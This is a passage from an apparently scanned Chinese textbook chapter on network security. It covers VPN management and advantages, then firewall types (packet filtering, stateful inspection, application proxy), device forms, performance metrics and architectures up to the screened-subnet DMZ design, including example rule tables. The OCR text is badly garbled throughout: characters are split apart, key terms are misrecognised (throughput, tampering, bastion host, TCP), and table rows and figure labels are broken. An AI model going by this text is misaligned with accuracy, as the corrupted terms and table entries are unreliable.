能 卡 进行 识别 。 而 存储 于 智能 卡 中 ,基于 公 钥 密码 算法 和 PKI 的 数字 证 书 是 适 于 广泛 应 用 
且 安 全 水 准 很 高 的 识别 手段 。 各 个 网 络 银行 使 用 的 “U 盾 ” 就 是 此 类 识别 手段 。 

5. 管理 技术 

一 个 好 的 VPN 还 应 是 便于 管理 的 。 对 于 VPN 执行 的 各 种 安全 策略 ,如 加 密 算法 、 访 
问 权 限 设 置 \ 日 志 、 审 计 等 方面 需要 有 安全 有 效 的 管理 。 特 别 是 在 VPN 比较 大 和 复杂 的 情 
况 下 。 能 否 提 供 方便 有 效 的 管理 也 是 VPN 性 能 的 重要 指标 。 


8.2.4 VPN 的 优点 


性 能 价格 比 高 是 VPN 最 大 的 优点 ,也 是 VPN 这 种 网 络 安全 手段 兴盛 的 根本 原因 。 简 
单 而 言 ,VPN 具有 “专用 网 的 性 能 ,公共 网 的 价格 "。 这 虽然 是 近似 的 情况 ,但 对 于 广大 普通 
用 户 是 正确 的 。 

实际 上 VPN 由 于 需要 做 额外 的 处 理 ,性 能 上 比 专用 网 要 差 。 比 如 说 ,专线 模式 的 
VPN ,数据 链 路 层 虚 电路 的 VPN ,传输 性 能 可 以 和 专用 网 相当 ,而 MPLS 的 处 理 速 度 会 稍 
微 慢 一 点 。 而 隧道 协议 VPN 由 于 隧道 协议 的 开销 ,公共 网 络 的 服务 延迟 ,以 及 各 种 加 密 算 
法 的 开销 ,性 能 上 有 较 多 损失 。 但 是 由 于 计算 机 和 网 络 技术 的 进步 令 公 共 网 络 性 能 有 快速 
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的 提升 ,对 于 大 多 数 用 户 的 普通 应 用 来 说 ,这 种 性 能 上 的 差别 是 很 容易 被 公共 网 络 传输 速度 
的 提高 而 忽略 不 计 的 。 

从 价格 上 来 说 ,VPN 需要 向 ISP 申请 虚拟 专线 ,或 者 购置 支持 安全 协议 的 网 关 设备 , 投 
资 上 也 是 要 不 同 程度 地 高 于 仅 使 用 公共 网 络 时 的 花费 。 但 随 着 VPN 的 普及 和 相关 设备 生 
产 的 进步 ,多 投入 的 资金 也 很 容易 被 接受 。 

而 VPN 易于 扩展 ,不 需要 专门 的 线路 ,只 要 具有 恰当 公共 网 络 的 地 方 都 可 以 布设 VPN 
的 新 节点 。 当 然 这 种 “恰当 的 公共 网 络 ” 是 要 视 VPN 穿越 公共 网 络 的 方式 而 定 的 , 如 
MPLS VPN 一 般 需要 考虑 是 否 同 一 ISP 内 ,而 网 络 层 隧道 协议 VPN 则 基本 没有 限制 。 
VPN 还 通过 成 熟 的 加 密 技术 和 认证 技术 实现 了 更 为 安全 的 通信 ,通过 结合 防火 墙 等 安全 措 
施 可 以 保证 网 络 有 更 好 的 安全 性 。 


8.3 防火墙 技 术 


8.3.1 防火 墙 的 概念 


Internet 是 一 个 由 很 多 网 络 互 联 而 形成 的 网 络 ,在 带 给 人 们 极 大 便利 的 同时 ,也 由 于 其 
上 诸如 黑客 攻击 等 不 安全 因素 和 不 良 信息 给 使 用 者 带 来 种 种 损害 。 为 了 使 计算 机 网 络 免 受 
外 来 人 侵 的 攻击 ,阻隔 危险 信息 的 防火 墙 是 保护 网 络 安全 的 必然 选择 。 

防火 墙 被 认为 最 初 是 一 个 建筑 名 词 , 指 的 是 修建 在 房屋 之 间 、 院 落 之 间 、 街 区 之 间 , 用 以 
隔绝 火灾 蔓延 的 高 墙 。 而 这 里 介绍 的 用 于 计算 机 网 络 安全 领域 的 防火 墙 则 是 指 设置 于 网 络 
之 间 ,通过 控制 网 络 流量 .阻隔 危险 网 络 通信 以 达到 保护 网 络 的 目的 ,由 硬件 设备 和 软件 组 
成 的 防御 系统 。 像 建筑 防火 墙 阻挡 火灾 、 保 护 建 筑 一样 , 它 有 阻挡 危险 流量 、 保 护 网 络 的 功 
能 。 从 信息 保障 的 角度 来 看 ,防火 墙 是 一 种 保护 (protect) 手 段 。 

防火 墙 一 般 都 是 布置 于 网 络 之 间 的 。 防 火 墙 最 常见 的 形式 是 布置 于 公共 网 络 和 企 事业 
单位 内 部 的 专用 网 络 之 间 ,用 以 保护 内 部 专用 网 络 。 有 时 在 一 个 网 络 内 部 也 可 能 设置 防火 
墙 , 用 来 保护 某 些 特定 的 设备 ,但 被 保护 关键 设备 的 IP 地 址 一 般 会 和 其 他 设备 处 于 不 同 网 
段 。 甚 至 有 类 似 大 防火 墙 (Great Fire Wall,GFW) 那 样 保护 整个 国家 网 络 的 防火 墙 。 其 实 ， 
只 要 是 有 必要 ,有 网 络 流量 的 地 方 都 可 以 布置 防火 墙 。 

防火 墙 保护 网 络 的 手段 就 是 控制 网 络 流量 。 网 络 之 上 的 各 种 信息 都 是 以 数据 包 的 形式 
传递 的 ,网 络 防火 墙 要 实现 控制 流量 就 是 要 对 途经 其 的 各 个 数据 包 进 行 分 析 ,判断 其 危险 与 
否 , 据 此 决定 是 否 允 许 其 通过 。 对 数据 包 说 “Yes” 或 “No” 是 防火 墙 的 基本 工作 。 不 同 种 类 
的 防火 墙 查看 数据 包 的 不 同 内容 , 但 是 究竟 对 怎样 的 数据 包 内 容 说 “Yes? 或 “No”, 其 规则 是 
由 用 户 来 配置 的 。 也 就 是 说 ,防火 墙 决定 数据 包 是 否 可 以 通过 ,要 看 用 户 对 防火 墙 查看 的 内 
容 制定 怎样 的 规则 。 

用 以 保护 网 络 的 防火 墙 会 有 不 同 的 形式 和 不 同 的 复杂 程度 。 它 可 以 是 单一 设备 也 可 以 
是 一 系列 相互 协作 的 设备 ; 设备 可 以 是 专门 的 硬件 设备 ,也 可 以 是 经 过 加 固 甚 至 只 是 普通 
的 通用 主机 ; 设备 可 以 选择 不 同形 式 的 组 合 ,具有 不 同 的 拓扑 结构 。 
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8.3.2 防火 墙 的 分 类 


依据 不 同 的 保护 机 制 和 工作 原理 ,人 们 一 般 将 防火 墙 分 为 三 类 : 包 过 滤 防 火 墙 , 状态 检 
测 包 过 滤 防 火 墙 应 用 服务 代理 防火 墙 。 这 些 防 火 墙 的 功能 不 同 ,常见 的 实现 方式 ,以 及 它 
们 的 性 能 ,安全 性 也 不 同 。 

1. 包 过 滤 防 火 墙 

包 过 滤 防 火 墙 也 称 为 分 组 过 滤 防 火 墙 ,只 查看 数据 包 的 IP 头 和 TCP/UDP 头 的 部 分 信 
息 , 据 此 判断 是 否 允 许 数 据 包 通过 。 其 查看 的 信息 包括 源 IP 地 址 \ 目 的 IP 地 址 、TCP/UDP 
端口 号 ,承载 协议 等 。 

用 户 为 防火 墙 制定 的 规则 需要 说 明 防火 墙 查 看 的 信息 ,以 及 是 否 允 许 通过 。 表 8-3 是 
一 个 包 过 滤 防 火 墙 规则 的 实例 。 


表 8-3 包 过 滤 防 火 墙 规则 实例 


编号 ”方向 源 IP 地 址 目的 IP 地 址 协议 源 端口 目的 端口 操作 
1 进 Any 120. 100. 80.1 n/a n/a n/a 拒绝 
2 进 202.100.50.3 120.100.80.0 TER 23 >1023 允许 
3 出 120.100.80.2 Any TeP >1023 25 允许 
4 进 Any 120. 100. 80.2 TCP 25 >1023 允许 
5 进 192.100.5.0 120. 100. 80. 4 TCP >1023 80 允许 
6 出 120.100.80.4 192.100.5.0 TCP 80 >1023 允许 


各 条 包 过 滤 规 则 以 一 定 顺 序 排列 , 包 过 滤 防 火 墙 在 决定 一 个 数据 包 是 否 可 以 通过 时 会 
逐一 查看 各 条 规则 。 当 过 到 一 条 规则 与 数据 包 相 匹配 时 ,就 按照 该 规则 来 处 理 数据 包 ,而 不 
再 继续 查看 列表 中 该 规则 后 面 的 其 他 规则 。 防 火 墙 将 按照 匹配 的 规则 是 “允许 ?还 是 “拒绝 ” 
来 决定 是 否 让 数据 包 通 过 。 如 果 没 有 任何 一 条 规则 与 数据 包 匹 配 , 防 火 墙 将 拒绝 该 数据 包 
通过 ,这 是 一 种 “一 切 未 被 允许 的 都 是 被 禁止 ”的 原则 。 

包 过 滤 防 火 墙 处 理 数据 包 时 需要 查看 的 内 容 比较 少 ,执行 起 来 简单 .迅速 ,但 是 功能 相 
对 有 限 。 从 其 规则 的 制定 上 来 看 ,单条 规则 的 制定 很 容易 ,但 当 规则 条 目 太 多 时 可 能 会 有 意 
想不到 的 麻烦 ,在 后 面 讨论 防火 墙 体 系 结构 时 再 做 介绍 。 

由 于 包 过 滤 防 火 墙 的 功能 很 简单 ,因此 容易 以 专门 的 硬件 来 实现 。 在 这 些 硬 件 设备 中 ， 
用 户 配置 的 规则 列表 存放 于 专门 寄存 器 而 不 是 普通 内 存 中 ,依据 规则 查验 数据 包 决定 是 否 
放行 的 功能 用 硬件 或 固件 来 实现 。 这 种 形式 的 专用 防火 墙 设备 本 身 具 有 更 强 的 抗 攻击 能 
力 , 有 较 高 的 安全 性 。 有 时 也 可 以 通过 在 路 由 器 上 设置 访问 控制 列表 来 实现 包 过 滤 防 火 墙 
的 功能 ,但 这 样 做 的 安全 性 要 差 。 

2. 状态 检测 包 过 滤 防 火 墙 

状态 检测 包 过 滤 防 火 墙 可 以 视 为 是 普通 包 过 滤 防 火 墙 的 一 种 扩展 。 它 也 查看 数据 包 
IP 头 和 TCP 头 中 关于 了 P 地 址 、 承 载 协议 .端口 号 之 类 的 信息 ,并 依据 人 们 设置 的 规则 来 决 
定 是 否 对 数据 包 放 行 。 除 此 之 外 ,状态 检测 包 过 滤 防 火 墙 还 会 跟踪 每 个 通过 防火 墙 的 TCP 
连接 的 状态 ,根据 一 个 数据 包 是 否 合乎 某 个 TCP 连接 的 状态 来 决定 是 否 放行 该 数据 包 。 

一 个 TCP 连接 有 自己 的 生存 周期 和 不 同 状态 。 其 通过 三 次 握手 协议 建立 ,四 次 挥手 协 
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议 终止 ,这 些 都 是 有 明显 时 序 性 质 的 。 此 外 ,在 正常 数据 交换 时 ,有 接收 窗口 和 发 送 窗 口 的 
设置 ,超出 窗口 范围 的 数据 都 将 不 被 处 理 。 这 些 都 可 以 作为 判断 数据 包 是 否 符合 TCP 连接 
状态 的 依据 。 通 过 检测 数据 包 是 否 属于 某 一 个 TCP 连接 ,其 是 否 符合 该 TCP 连接 应 有 的 
状态 ,将 此 作为 基本 包 过 滤 规 则 基础 上 进一步 判断 数据 包 是 否 应 该 放行 的 依据 。 

对 于 UDP 应 用 ,状态 检测 包 过 滤 防 火 墙 可 以 通过 在 相应 UDP 通信 上 设置 一 个 虚拟 的 
UDP 连接 。 对 于 UDP 数据 包 , 除 了 检测 其 满足 包 过 滤 规 则 外 还 可 以 查验 其 是 否 满足 预期 
的 UDP 状态 。 

状态 检测 包 过 滤 防 火 墙 在 普通 包 过 滤 防 火 墙 基础 上 增加 了 检测 内 容 , 其 处 理 复 杂 一 些 ， 
功能 更 强大 一 些 。 如 果 做 成 专门 的 防火 墙 硬件 ,除了 增加 判断 TCP 状态 的 硬件 或 固件 外 ， 
还 需要 用 以 存储 TCP/UDP 状态 的 寄存 器 。 

3. 应 用 服务 代理 防火 墙 

在 使 用 网 络 服务 的 时 候 , 用 户 可 以 不 必用 自己 的 计算 机 直接 连接 服务 器 ,而 通过 一 种 称 
为 “应 用 服务 代理 ”的 服务 器 来 获取 自己 需要 的 服务 。 用 户 首先 将 自己 请 求 的 服务 发 送 给 应 
用 代理 服务 器 ,由 它 向 网 络 应 用 服务 器 发 送 请 求 ; 网 络 应 用 服务 器 在 获得 请 求 后 将 服务 数 
据 发 送 给 应 用 服务 代理 ,再 由 应 用 服务 代理 将 其 发 送 给 提出 服务 请 求 的 计算 机 。 利 用 应 用 
服务 代理 获取 网 络 服 务 的 计算 机 不 必 具 有 访问 互联 网 的 能 力 。 不 同 的 应 用 自然 需要 不 同 的 
应 用 代理 服务 器 功能 ,当然 ,同一 台 机 器 上 可 以 运行 不 同 的 应 用 代理 服务 程序 。 

如 果 在 应 用 服务 代理 服务 器 上 增加 了 判断 是 否 应 该 转发 需要 传递 的 数据 包 的 功能 , 它 
就 成 为 了 应 用 服务 代理 防火 墙 。 和 包 过 滤 以 及 状态 检测 包 过 滤 防 火 墙 仅 查看 数据 包 的 IP 
头 和 TCP 头 的 部 分 数据 不 同 ,应 用 服务 代理 防火 墙 可 以 查看 数据 包 中 的 应 用 协议 和 应 用 数 
据 部 分 。 比 如 说 ,可 以 查找 数据 包 中 是 否 具有 某 些 关键 字 ,关键 序列 。 

应 用 服务 代理 防火 墙 需要 查看 的 内 容 更 多 ,按照 用 户 不 同 的 需要 做 各 种 复杂 的 分 析 操 
作 , 对 不 同 种 类 的 应 用 也 需要 有 不 同 的 查看 和 分 析 操作 。 相 比 前 面 介绍 的 两 种 防火 墙 ,应 用 
服务 代理 防火 墙 对 数据 包 有 更 深入 的 分 析 , 功 能 更 为 强大 。 但 同时 由 于 需要 进行 的 处 理 更 
加 复杂 和 多 样 ,应 用 服务 代理 防火 墙 需要 进行 大 量 的 运算 ,对 数据 包 的 处 理 效率 也 最 低 。 

由 于 处 理 情况 复杂 ,数据 量 大 .需要 进行 的 运算 量 也 非常 大 ,应 用 服务 代理 防火 墙 的 功 
能 很 难 用 硬件 或 固件 来 实现 。 一 般 应 用 代理 防火 墙 会 采用 经 过 一 定 加 固 的 通用 计算 机 
设备 。 

8.3.3 防火 墙 的 不 同形 态 

无 论 是 包 过 滤 防 火 墙 还 是 状态 检测 包 过 滤 防 火 墙 以 及 应 用 服务 代理 防火 墙 , 本 身 都 会 
以 一 定 的 设备 的 形态 出 现 。 这 里 简单 介绍 不 同 的 防火 墙 形态 。 

1. 专用 硬件 设备 

专门 的 硬件 防火 墙 设备 ,将 防火 墙 程序 做 到 芯片 中 ,防火 墙 还 拥有 专门 的 寄存 器 以 存放 
用 户 规则 .连接 状态 之 类 的 信息 。 无 论 是 防火 墙 程序 还 是 运行 所 需 的 信息 都 很 难 被 攻击 和 
算 改 ,在 网 络 攻击 面前 防火 墙 很 坚固 ,有 很 大 的 安全 性 。 这 是 包 过 滤 防 火 墙 和 状态 检测 包 过 
滤 防 火 墙 常见 的 形式 。 
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2. 安排 在 特定 功能 的 硬件 设备 (如 路 由 器 ) 上 

路 由 器 一 般 都 可 以 设置 包 过 滤 功 能 ,起 到 一 定 的 防火 墙 效果 。 由 于 不 是 专门 的 设备 , 实 
现 防 火 墙 功能 的 程序 和 需要 的 一 些 信息 存放 于 路 由 器 内 存 中 ,程序 和 运行 所 需 信 息 容易 被 
攻击 和 算 改 ,此 种 防火 墙 自身 的 安全 性 比较 差 ,一 般 只 是 权宜 之 计 。 

3. 加 固 主机 

使 用 特定 硬件 、 软 件 ( 如 安全 操作 系统 ) 加 固 的 主机 负担 防火 墙 工作 。 防 火 墙 程序 
要 的 规则 等 信息 都 存放 于 机 器 内 存 中 ,由 于 主机 经 过 加 固 , 它 们 也 不 那么 容易 受到 攻击 
改 ,安全 性 也 比较 好 。 虽 然 , 由 于 主机 有 很 好 的 通用 性 ,此 类 设备 可 以 负担 各 种 防火 墙 , 但 一 
般 还 是 用 于 程序 较为 复杂 ,需要 运算 力 较 高 的 应 用 代理 服务 防火 墙 上 。 

4. 运行 于 普通 通用 计算 机 之 上 的 软件 

由 于 不 采用 任何 的 专门 设备 ,虽然 软件 自身 一 般 都 会 采取 一 些 安全 措施 ,但 总 体 来 说 ， 
操作 系统 和 防火 墙 软件 还 是 容易 被 攻击 和 算 改 ,导致 其 失效 。 这 样 形式 的 防火 墙 一 般 只 用 
于 单个 主机 、 小 规模 网 络 的 较 低 安全 要 求 应 用 。Windows 等 操作 系统 自身 就 带 有 此 类 防火 
墙 功 能 ,一 些 从 事 网 络 安 全 的 软件 公司 也 提供 这 类 工具 ,如 天 网 个 人 防火 墙 \ 瑞 星 个 人 防火 
墙 、 金 山 网 镖 等 。 


8.3.4 防火 墙 设备 的 性 能 指标 


防火 墙 通过 流量 控制 来 实现 网 络 保护 的 功能 ,为 了 实现 如 此 功能 防火 墙 需要 逐一 处 理 
途经 其 的 每 个 数据 包 。 这 需要 时 间 ,从 而 对 其 保护 的 网 络 产生 影响 。 防 火 墙 设备 本 身 的 性 
能 如 何 将 对 最 终 网 络 用 户 得 到 的 实际 带宽 有 决定 性 的 影响 。 

对 不 同 的 防火 墙 ,需要 考虑 的 指标 有 所 不 同 , 下 面 介绍 一 些 常 见 的 防火 墙 性 能 指标 。 

1. 香 吐 量 

吞吐 量 是 指 设备 在 不 丢 包 情况 下 达到 的 最 大 数据 转发 速率 ,反映 防火 墙 转发 数据 能 力 。 
吞吐 量 的 大 小 主要 由 防火 墙 网 络 接 口 的 速率 及 程序 算法 的 效率 决定 。 防 火 墙 网 络 端 口 本 身 
的 速率 是 防火 墙 接收 和 转发 数据 的 极限 ; 而 防火 墙 程序 算法 的 执行 效率 则 在 很 大 程度 上 影 
响 这 种 极限 的 发 挥 。 由 于 防火 墙 需要 查看 数据 包 的 内 容 并 且 进 行 分 析 , 这 会 消耗 防火 墙 的 
运算 能 力 和 处 理 时 间 , 从 而 影响 到 防火 墙 的 工作 效率 。 

2. 时 延 

网 络 中 加 入 防火 墙 必然 会 增加 数据 传输 时 延 。 而 时 延 有 存储 转发 时 延 和 直通 转发 时 延 
两 种 。 防 火 墙 一 般 都 工作 在 第 三 层 以 上 ,一 般 以 存储 转发 方式 对 数据 包 进 行 处 理 。 对 存储 
转发 型 设备 ,时 延 是 指 从 数据 包 最 后 一 个 比特 进入 防火 墙 开 始 , 到 数据 包 第 一 个 比特 离开 该 
设备 的 时 间 间 隔 。 时 延 反 映 了 防火 墙 对 数据 包 的 处 理 速度 。 

吞吐 量 和 时 延 是 防火 墙 设备 本 身 的 指标 。 而 当 防 火 墙 处 于 某 种 特定 的 网 络 环境 中 运行 
的 时 候 还 有 一 些 性 能 指标 。 

3. 丢 包 率 

丢 包 率 是 指 在 特定 网 络 负 载 下 ,由 于 资源 不 足 而 造成 的 那些 应 转发 而 未 能 转发 的 数据 
包 的 比率 。 丢 包 率 是 防火 墙 设备 在 特定 网 络 负载 情况 下 稳定 性 和 可 靠 性 的 指标 。 


和 算 
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4. 背靠背 

背靠背 是 指 从 介质 空闲 到 介质 满 负 荷 时 ,防火 墙 第 一 次 出 现 丢 帧 情况 之 前 发 送 的 数据 
包 数 量 。 这 种 指标 反映 了 设备 的 缓存 能 力 和 处 理 突 发 数据 流 的 能 力 。 

以 上 列 出 的 指标 对 各 种 防火 墙 都 适用 。 而 有 一 些 指标 仅 对 某 些 特定 种 类 的 防火 墙 
适用 。 

5. 并 发 连接 数 

并 发 连接 数 是 指 通 信和 的 主机 之 间 穿 越 防火 墙 ,以 及 主机 和 防火 墙 之 间 能 够 建立 的 最 大 
TCP 连接 数 。 此 种 指标 对 于 状态 检测 包 过 滤 防 火 墙 尤 其 重要 。 

6. HTTP 传输 速率 和 HTTP 事务 处 理 速率 

这 两 个 指标 适用 于 评价 HTTP 应 用 服务 代理 防火 墙 的 性 能 。HTTP 传输 速率 表示 
HTTP 应 用 服务 代理 防火 墙 针 对 HTTP 数据 的 平均 传输 速率 ,是 被 请 求 的 目标 数据 通过 
防火 墙 的 平均 传输 速率 。HTTP 事务 处 理 速率 是 防火 墙 所 能 维持 的 最 大 事务 处 理 速率 , 即 
用 户 在 访问 目标 时 ,所 能 达到 的 最 大 速率 。 类 似 这 样 的 一 些 指 标 标志 了 应 用 服务 代理 防火 
墙 的 处 理 能 力 和 应 用 数据 转发 能 力 。 


8.3.5 防火 墙 系统 的 结构 


前 面 介绍 了 不 同 种 类 的 防火 墙 以 及 用 于 实现 它们 的 不 同 的 设备 形式 ,但 在 实际 的 网 络 
中 一 般 都 不 是 依靠 单一 的 某 一 种 防火 墙 设备 来 保护 网 络 的 。 网 络 中 布置 的 防火 墙 可 以 使 用 
多 种 设备 ,并 有 自己 的 拓扑 结构 ,这 便 是 防火 墙 体系 结构 要 讨论 的 内 容 。 在 这 里 将 介绍 在 公 
共 网 络 与 专用 网 络 之 间 采 用 的 几 种 比较 典型 的 防火 墙 结构 。 

1. 屏蔽 路 由 器 

此 种 防火 墙 结构 的 设备 配置 仅 需 要 一 台 包 过 滤 防 火 墙 或 状态 检测 包 过 滤 防 火 墙 设备 ， 
该 设备 配置 于 内 部 和 外 部 网 络 之 间 , 起 到 屏 护 内 部 专用 网 络 的 作用 ,此 种 结构 如 图 8-18 


所 示 。 
化 
1 


包 过 滤 防 火 墙 
图 8-18 屏蔽 路 由 器 结构 


防火 墙 依据 用 户 设置 的 规则 对 过 往 的 数据 包 进行 安全 过 滤 。 防 火 墙 设备 一 般 使 用 专门 
的 防火 墙 设备 ,或 者 是 在 路 由 器 上 配置 访问 控制 列表 来 实现 。 也 可 以 使 用 通用 主机 或 者 加 
固 过 的 通用 主机 ,运行 具有 包 过 滤 或 者 状态 检测 包 过 滤 功能 的 软件 。 

此 种 防火 墙 结构 的 优点 就 是 简单 ,易于 实现 .设备 花费 少 、 网 络 性 能 损失 少 。 

屏蔽 路 由 器 的 缺点 如 下 。 

(1) 包 过 滤 规 则 制定 较为 复杂 。 前 面 在 介绍 防火 墙 的 分 类 并 提 及 包 过 滤 防 火 墙 时 说 
过 , 包 过 滤 防 火 墙 的 规则 条 目 较 多 时 容易 有 麻烦 ,这 里 展开 介绍 一 下 。 比 如 说 ,要 让 某 网 络 
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中 除了 部 分 IP 地 址 可 以 访问 外 部 网 络 ,规则 的 制定 就 要 小 心 。 如 果 先 设置 拒绝 整个 网 络 的 
IP 的 规则 条 目 , 然 后 再 设置 允许 特定 IP 的 规则 条 目 , 如 表 8-4 所 示 。 当 遇 到 要 处 理 特定 IP 
的 数据 包 时 ,防火墙 会 首先 依据 拒绝 整个 网 络 IP 的 条 目 处 理 ,根本 不 会 看 下 一 条 允许 通行 
的 规则 。 一 般 来 说 ,解决 这 种 情况 的 方法 是 ,包含 地 址 、 端 口 少 的 条 目 写 在 前 面 ,如 表 8-5 
所 示 。 

表 8-4 错误 的 包 过 滤 规 则 顺序 


编号 方向 源 人 P 目的 IP 协议 源 端口 目的 端口 操作 
1 出 192. 168. 1.0 Any n/a n/a n/a 拒绝 
2 出 192.168.1.1 Any n/a n/a n/a 允许 


表 8-5 正确 的 包 过 滤 规 则 顺序 


编号 方向 源 人 P 目的 IP 协议 源 端口 目的 端口 操作 
1 出 192. 168. 1.1 Any n/a n/a n/a 允许 
2 出 192. 168. 1.0 Any n/a n/a n/a 拒绝 


(2) 配置 不 能 隐藏 内 部 网 络 结构 。 如 果 没 有 采取 网 络 地 址 转换 ,内 部 网 络 具 有 外 部 网 
络 访问 权限 的 机 器 都 会 将 含有 自己 真实 IP 的 数据 包 发 送 到 公共 网 络 上 。 一 个 有 心 的 监听 
者 则 可 以 很 容易 地 根据 这 些 数据 包 的 IP 地 址 推测 出 内 部 网 络 的 结构 等 信息 。 

(3) 结构 比较 简单 ,其 全 部 安全 系 于 一 台 防 火 墙 ,相对 易于 攻破 一 一 尤其 是 当 防火 墙 设 
备 没有 选择 专门 硬件 设备 的 情况 下 。 当 防火 墙 本 身 被 攻破 ,内 部 网 络 将 处 于 无 保护 的 境地 。 

2. 双 宿 主机 网 关 

此 种 结构 的 防火 墙 采用 一 台 应 用 代理 服务 防火 墙 设备 来 实现 。 该 设备 配置 于 内 部 、 外 
部 网 络 之 间 , 用 于 屏 护 内 部 网 络 , 此 种 结构 如 图 8-19 所 示 。 


内 部 网 络 要 


应 用 代理 防火 墙 
8-19 双 宿 主机 网 关 结 构 


防火 墙 设备 一 般 需 选用 加 固 过 的 有 两 个 网 络 接口 的 主机 ,也 可 以 选择 有 两 个 网 络 接口 
的 普通 计算 机 ,该 主机 通常 被 称 为 “堡垒 主机 ”。 于 其 上 运行 应 用 服务 代理 防火 墙 软件 ,依据 
用 户 制定 的 规则 来 对 过 往 的 应 用 数据 包 进行 分 析 和 判断 。 

此 种 体系 的 防火 墙 也 比较 简单 ,易于 实现 ,花费 较 少 ; 由 于 采用 应 用 代理 模式 ,外 部 网 
络 只 能 看 到 堡垒 主机 的 IP, 从 而 屏蔽 了 内 部 网 络 信息 ; 可 以 容易 地 控制 内 部 网 络 和 外 部 网 
络 之 间 交 流 哪些 应 用 层 数据 。 

但 是 此 种 体系 的 防火 墙 也 是 单 层 屏蔽 , 堡 公主 机 直接 面 对 各 种 外 部 攻击 ,一 旦 堡垒 主机 
被 攻破 一 一 当 没 有 选择 足够 坚固 的 加 固 主 机 设备 时 十 分 容易 ,整个 网 络 将 直接 暴露 于 各 种 
危险 之 下 。 
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3. 屏蔽 单 宿 堡 又 主机 

此 种 结构 需要 采用 两 台 防 火 墙 设备 ,一 台 是 包 过 滤 或 状态 检测 包 过 滤 防 火 墙 , 一 台 应 用 
服务 代理 防火 墙 。 应 用 服务 代理 防火 墙 (堡垒 主机) 只 需 一 个 网 络 接口 ,其 和 内 部 网 络 中 其 
他 设备 一 样 接 在 网 络 中 。 此 种 结构 如 图 8-20 所 示 。 


时 


应 用 代理 防火 墙 包 过 滤 防 火 增 


图 8-20 屏蔽 单 宿 堡垒 主机 结构 


内 部 网 络 中 所 有 机 器 不 得 直接 访问 外 部 网 络 , 如 果 有 访问 外 部 网 络 的 需求 则 需要 通过 
应 用 服务 代理 防火 墙 来 进行 。 包 过 滤 防火 墙 设置 成 只 允许 保全 主机 和 外 界 进 行 访问 即 可 ， 
不 需要 复杂 的 包 过 滤 规则 表 。 此 种 防火 墙 结构 下 ,由 被 包 过 滤 防 火 墙 保护 的 堡垒 主机 代理 
所 有 外 部 网 络 服务 访问 任务 ,而 堡 侄 主机 只 有 一 个 网 络 接口 ,故而 得 名 。 

此 种 结构 采用 了 两 种 防火 墙 设备 ,优势 互补 ,提供 了 更 多 的 安全 性 。 包 过 滤 防 火 墙 的 包 
过 滤 规则 很 容易 制定 。 

此 种 结构 的 缺点 在 于 ,虽然 逻辑 处 理 上 对 内 部 网 络 实现 了 两 层 保护 ,但 实际 上 仍然 只 有 
包 过 滤 防 火 墙 这 一 层 保护 。 若 其 被 攻破 整个 内 部 网 络 其 实 将 失去 保护 。 

4. 屏蔽 双 宿 堡垒 主机 

屏蔽 双 宿 保 件 主 机 与 屏蔽 单 宿 保健 主机 类 似 ,也 是 采用 两 台 防 火 墙 设备 ,一 台 是 包 过 滤 
或 者 状态 检测 包 过 滤 防火 墙 ,一 台 应 用 服务 代理 防火 墙 。 但 应 用 服务 代理 防火 墙 (保全 主 
机 ) 需 有 两 个 网 络 接口 ,其 放置 于 包 过 滤 防 火 墙 和 内 部 网 络 之 间 。 此 种 结构 如 图 8-21 所 示 。 


内 部 网 络 内 
时 
4 


应 用 代理 防火 墙 


包 过 滤 防 火 墙 
图 8-21 屏蔽 双 宿 堡 垒 主机 结构 


与 屏蔽 单 宿 堡垒 主机 结构 类 似 。 此 种 防火 墙 结构 下 内 部 网 络 各 个 机 器 也 是 不 能 直接 访 
问 外 部 网 络 ,任何 访问 均 需 要 通过 堡垒 主机 的 应 用 代理 服务 进行 。 包 过 滤 防 火 墙 则 设置 成 
只 人 允许 堡垒 主机 对 外 界 进 行 访问 。 差 别 只 是 堡垒 主机 需要 两 个 网 络 接口 ,对 内 部 网 络 和 外 
部 网 络 实施 物理 上 的 隔离 。 

此 种 结构 的 防火 墙 具有 屏蔽 单 宿 堡垒 主机 的 所 有 优点 ,又 能 避免 其 实质 上 是 单 层 防护 
的 整 端 。 

但 是 ,对 于 一 些 有 建立 类 似 Web 服务 .邮件 服务 之 类 需求 的 机 构 , 用 此 种 防火 墙 结构 屏 
护 内 部 网 络 显然 是 不 够 的 。 这 些 应 用 服务 器 会 与 外 部 各 种 用 户 频繁 地 打 各 种 交道 ,容易 被 
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攻击 者 以 防火 墙 无 法 察觉 的 方式 人 侵 。 如 果 将 这 些 服务 器 也 放置 于 内 部 网 络 中 ,被 人 侵 的 
这 些 应 用 服务 器 就 容易 成 为 整个 内 部 网 络 的 安全 隐患 。 

5. 屏蔽 子 网 

此 种 防火 墙 结构 是 这 里 介绍 的 最 安全 的 一 种 。 其 需要 两 台 包 过 滤 或 者 状态 检测 包 过 滤 
防火 墙 和 一 台 应 用 服务 代理 防火 墙 。 此 种 结构 如 图 8-22 所 示 。 


包 过 滤 防 火 墙 
4 
DMZ jy Cr ) 
上 外 部 网 络 
a 
应 用 代理 防火 墙 


图 8-22 屏蔽 子 网 结构 


两 台 包 过 滤 防 火 墙 都 物理 地 隔绝 内 部 网 络 与 外 部 网 络 。 这 样 ,内 部 网 络 、 外 部 网 络 设备 
之 间 的 互 访 是 需要 通过 两 台 包 过 滤 防 火 墙 的 。 两 台 包 过 滤 防 火 墙 之 间 的 区 域 即 为 “屏蔽 子 
网 ”, 一 般 常 被 称 为 “ 非 军事 区 ”(DeMilitarized Zone, DMZ)。 保 琳 主 机 将 被 放置 于 非 军事 
区 ,一 般 采 取 单 宿 形式 。 在 DMZ 中 还 可 以 布置 Web 服务 器 (如 公司 主页 ) .邮件 服务 器 之 
类 的 设备 。 

内 部 包 过 滤 防 火 墙 的 包 过 滤 规 则 将 被 设置 为 只 允许 内 部 网 络 和 DMZ 内 的 设备 通信 ; 
外 部 包 过 滤 防火 墙 的 包 过 滤 规 则 将 被 设置 为 只 允许 外 部 网 络 和 DMZ 内 的 设备 通信 。 也 就 
是 说 ,没有 内 部 网 络 ,外 部 网 络 之 间 直 接 通 信 的 可 能 ,内 部 网 络 对 外 部 网 络 的 任何 访问 都 需 
要 经 过 保 垒 主机 的 应 用 服务 代理 才能 进行 。 

屏蔽 子 网 结构 为 内 部 网 络 提供 了 更 安全 的 防护 。 包 过 滤 防 火 墙 规则 制定 也 比较 简单 ， 
不 泄露 内 部 网 络 结构 ,DMZ 区 内 除了 放置 堡垒 主机 外 还 可 以 设置 面向 公共 网 络 的 各 种 设 
